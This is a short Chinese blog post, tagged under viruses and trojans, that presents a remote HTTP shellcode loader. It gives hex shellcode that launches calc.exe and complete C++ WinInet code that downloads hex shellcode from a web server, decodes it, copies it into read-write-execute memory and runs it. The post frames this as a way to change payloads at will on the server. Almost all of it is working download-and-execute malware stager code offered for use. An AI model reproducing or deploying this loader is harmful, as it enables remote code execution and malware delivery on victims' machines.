http Shellcode Loader

Yozz

2022 年 02 月 04 日

926 次浏览

暂无评论

3272字数

后端开发病毒木马逆向破解

远程http请求Shellcode加载，Shellcode放于服务器http服务上，可随意变更ShellCode

演示

Shellcode

放于服务器上得Shellcode必须是整一段16进制代码
利用搜索替换掉 \x 或,0x ; " 符号成一段完整16进制代码

弹出计算机Shellcode

E900000000558BEC83EC18B94C772607E8440000008D4DE8C745E87573657251C745EC33322E6466C745F06C6CC645F200FFD0B9318B6F87E81C0000006A058D4DF4C745F463616C6351C745F82E657865C645FC00FFD0C9C3558BEC83EC1C64A1300000005356578B400C894DEC8B780CE9A70000008B473033F68B5F2C8B3F8945F88B423C897DF48B4410788945F085C00F8485000000C1EB1033C985DB742D8B7DF80FBE140FC1CE0D803C0F618955F87C098BC283C0E003F0EB030375F8413BCB72DF8B55FC8B7DF48B45F08B4C101833DB8B44102003C2894DE885C9743C8B0833FF03CA83C004894DF88BD18945E48A0AC1CF0D0FBEC103F84284C975F18B55FC897DF88B45F88B7DF403C63B45EC741E8B45E4433B5DE872C48B57188955FC85D20F854BFFFFFF33C05F5E5BC9C38B75F08B4416248D04580FB70C108B44161C8D04888B041003C2EBDF

Demo

查看代码

#include <stdio.h>
#include <Windows.h>
#include <WinInet.h>
#pragma comment(lib, "WinInet.lib")

char* GetUrlPage(char* URL, char* SubPath)
{
    HINTERNET hInternet, hConnect, hRequest = NULL;
    DWORD dwOpenRequestFlags, dwRet = 0;
    unsigned char* pResponseHeaderIInfo = NULL;
    DWORD dwResponseHeaderIInfoSize = 2048;
    BYTE* pBuf = NULL;
    DWORD dwBufSize = 64 * 2048;

    hInternet = ::InternetOpen("www.nstns.com/0.1", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
    hConnect = ::InternetConnect(hInternet, URL, INTERNET_DEFAULT_HTTP_PORT, 0, 0, INTERNET_SERVICE_HTTP, 0, 0);
    if (NULL == hConnect)
        return NULL;

    dwOpenRequestFlags = INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP | INTERNET_FLAG_KEEP_CONNECTION |
        INTERNET_FLAG_NO_AUTH | INTERNET_FLAG_NO_COOKIES | INTERNET_FLAG_NO_UI | INTERNET_FLAG_RELOAD;

    hRequest = HttpOpenRequest(hConnect, "GET", SubPath, NULL, NULL, NULL, dwOpenRequestFlags, 0);
    HttpSendRequest(hRequest, NULL, 0, NULL, 0);

    pResponseHeaderIInfo = new unsigned char[dwResponseHeaderIInfoSize];
    RtlZeroMemory(pResponseHeaderIInfo, dwResponseHeaderIInfoSize);
    HttpQueryInfo(hRequest, HTTP_QUERY_RAW_HEADERS_CRLF, pResponseHeaderIInfo, &dwResponseHeaderIInfoSize, NULL);
    pBuf = new BYTE[dwBufSize];

    RtlZeroMemory(pBuf, dwBufSize);
    InternetReadFile(hRequest, pBuf, dwBufSize, &dwRet);
    return (char*)pBuf;
}


bool shellcode_Loding() {
    const char* ShellCode = GetUrlPage("127.0.0.1", "/shellcode.txt");
    //HTTP 请求ShellCode 代码

    printf("%s\n",ShellCode);

    int shellcode_length = strlen(ShellCode);
    unsigned char* value = (unsigned char*)calloc(shellcode_length / 2, sizeof(unsigned char));for (size_t count = 0; count < shellcode_length / 2; count++) {sscanf(ShellCode, "%2hhx", &value[count]);ShellCode += 2;}
    //处理ShellCode

    LPVOID Memory = VirtualAlloc(NULL,shellcode_length / 2, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    //开辟一块内存,设置可读可执行

    if (Memory == NULL) { return NULL; }
    memcpy(Memory, value,shellcode_length / 2);
    //复制ShellCode 到内存位置

    ((void(*)())Memory)();
    return 0;

}


int main(int argc, char* argv[])
{
    
    shellcode_Loding();
    system("pause");
    return 0;
}

http Shellcode Loader